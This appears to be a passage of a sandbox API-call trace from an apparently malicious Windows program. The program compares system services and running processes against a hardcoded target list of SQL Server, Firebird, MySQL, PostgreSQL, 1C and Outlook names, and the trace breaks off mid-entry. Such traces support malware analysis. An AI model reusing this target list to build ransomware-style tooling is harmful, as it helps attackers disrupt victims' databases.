[0041.751] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0041.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0041.751] lstrlenW (lpString="AudioSrv") returned 8 [0041.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0041.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0041.751] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0041.751] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0041.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0041.751] lstrlenW (lpString="BFE") returned 3 [0041.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0041.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0041.751] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0041.751] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0041.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0041.751] lstrlenW (lpString="CryptSvc") returned 8 [0041.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0041.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0041.751] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0041.751] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0041.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0041.751] lstrlenW (lpString="CscService") returned 10 [0041.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0041.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0041.751] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0041.751] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0041.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0041.751] lstrlenW (lpString="DcomLaunch") returned 10 [0041.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0041.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0041.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0041.752] lstrlenW (lpString="Dhcp") returned 4 [0041.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0041.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0041.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0041.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0041.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0041.752] lstrlenW (lpString="Dnscache") returned 8 [0041.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0041.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0041.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0041.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0041.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0041.752] lstrlenW (lpString="DPS") returned 3 [0041.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0041.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0041.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0041.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0041.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0041.752] lstrlenW (lpString="eventlog") returned 8 [0041.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0041.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0041.752] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0041.752] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0041.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0041.752] lstrlenW (lpString="EventSystem") returned 11 [0041.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0041.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0041.752] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0041.752] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0041.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0041.753] lstrlenW (lpString="gpsvc") returned 5 [0041.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0041.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0041.753] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0041.753] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0041.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0041.753] lstrlenW (lpString="iphlpsvc") returned 8 [0041.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.753] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0041.753] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0041.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0041.753] lstrlenW (lpString="LanmanServer") returned 12 [0041.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0041.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0041.753] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0041.753] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0041.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0041.753] lstrlenW (lpString="LanmanWorkstation") returned 17 [0041.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.753] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0041.753] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0041.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0041.753] lstrlenW (lpString="lmhosts") returned 7 [0041.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0041.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0041.753] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0041.753] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0041.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0041.753] lstrlenW (lpString="MMCSS") returned 5 [0041.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0041.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0041.754] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0041.754] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0041.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0041.754] lstrlenW (lpString="MpsSvc") returned 6 [0041.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0041.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0041.754] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0041.754] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0041.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0041.754] lstrlenW (lpString="Netman") returned 6 [0041.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0041.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0041.754] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0041.754] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0041.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0041.754] lstrlenW (lpString="netprofm") returned 8 [0041.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0041.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0041.754] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0041.754] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0041.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0041.754] lstrlenW (lpString="NlaSvc") returned 6 [0041.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0041.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0041.754] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0041.754] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0041.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0041.754] lstrlenW (lpString="nsi") returned 3 [0041.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0041.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0041.754] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0041.754] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0041.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0041.754] lstrlenW (lpString="PcaSvc") returned 6 [0041.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0041.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0041.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0041.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0041.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0041.755] lstrlenW (lpString="PlugPlay") returned 8 [0041.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0041.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0041.755] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0041.755] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0041.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0041.755] lstrlenW (lpString="Power") returned 5 [0041.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0041.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0041.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0041.755] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0041.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0041.755] lstrlenW (lpString="ProfSvc") returned 7 [0041.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0041.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0041.755] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0041.755] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0041.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0041.755] lstrlenW (lpString="RpcEptMapper") returned 12 [0041.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0041.755] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0041.755] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0041.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0041.755] lstrlenW (lpString="RpcSs") returned 5 [0041.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0041.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0041.755] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0041.756] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0041.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0041.756] lstrlenW (lpString="SamSs") returned 5 [0041.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0041.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0041.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0041.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0041.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0041.756] lstrlenW (lpString="Schedule") returned 8 [0041.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0041.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0041.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0041.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0041.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0041.756] lstrlenW (lpString="SENS") returned 4 [0041.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0041.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0041.756] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0041.756] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0041.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0041.756] lstrlenW (lpString="ShellHWDetection") returned 16 [0041.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0041.756] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0041.756] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0041.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0041.756] lstrlenW (lpString="Spooler") returned 7 [0041.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0041.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0041.756] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0041.756] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0041.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0041.756] lstrlenW (lpString="SysMain") returned 7 [0041.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0041.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0041.757] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0041.757] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0041.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0041.757] lstrlenW (lpString="Themes") returned 6 [0041.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0041.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0041.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0041.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0041.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0041.757] lstrlenW (lpString="TrkWks") returned 6 [0041.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0041.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0041.757] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0041.757] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0041.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0041.757] lstrlenW (lpString="UxSms") returned 5 [0041.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0041.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0041.757] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0041.757] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0041.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0041.757] lstrlenW (lpString="VSS") returned 3 [0041.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0041.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0041.757] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0041.757] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0041.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0041.757] lstrlenW (lpString="WdiServiceHost") returned 14 [0041.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0041.757] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0041.757] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0041.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0041.757] lstrlenW (lpString="WdiSystemHost") returned 13 [0041.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0041.758] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0041.758] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0041.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0041.758] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0041.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0041.758] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0041.758] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0041.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0041.758] lstrlenW (lpString="Winmgmt") returned 7 [0041.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0041.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0041.758] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0041.758] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0041.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0041.758] lstrlenW (lpString="WPDBusEnum") returned 10 [0041.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0041.758] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0041.758] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0041.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0041.758] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0041.758] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d8 [0041.761] Process32FirstW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0041.761] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0041.762] lstrlenW (lpString="System") returned 6 [0041.762] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0041.762] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0041.762] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0041.762] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0041.762] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0041.762] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0041.762] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0041.762] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0041.763] lstrlenW (lpString="smss.exe") returned 8 [0041.763] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0041.763] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0041.763] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0041.763] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0041.763] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0041.763] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0041.763] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0041.763] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.763] lstrlenW (lpString="csrss.exe") returned 9 [0041.763] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.764] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0041.764] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0041.764] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0041.764] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0041.764] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0041.764] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0041.764] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0041.764] lstrlenW (lpString="wininit.exe") returned 11 [0041.764] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0041.764] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0041.764] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0041.764] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0041.764] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0041.765] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0041.765] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0041.765] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0041.765] lstrlenW (lpString="csrss.exe") returned 9 [0041.765] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0041.765] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0041.766] lstrlenW (lpString="winlogon.exe") returned 12 [0041.766] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0041.767] lstrlenW (lpString="services.exe") returned 12 [0041.767] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0041.767] lstrlenW (lpString="lsass.exe") returned 9 [0041.767] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0041.768] lstrlenW (lpString="lsm.exe") returned 7 [0041.768] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.769] lstrlenW (lpString="svchost.exe") returned 11 [0041.769] Process32NextW (in: hSnapshot=0x1d8, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, 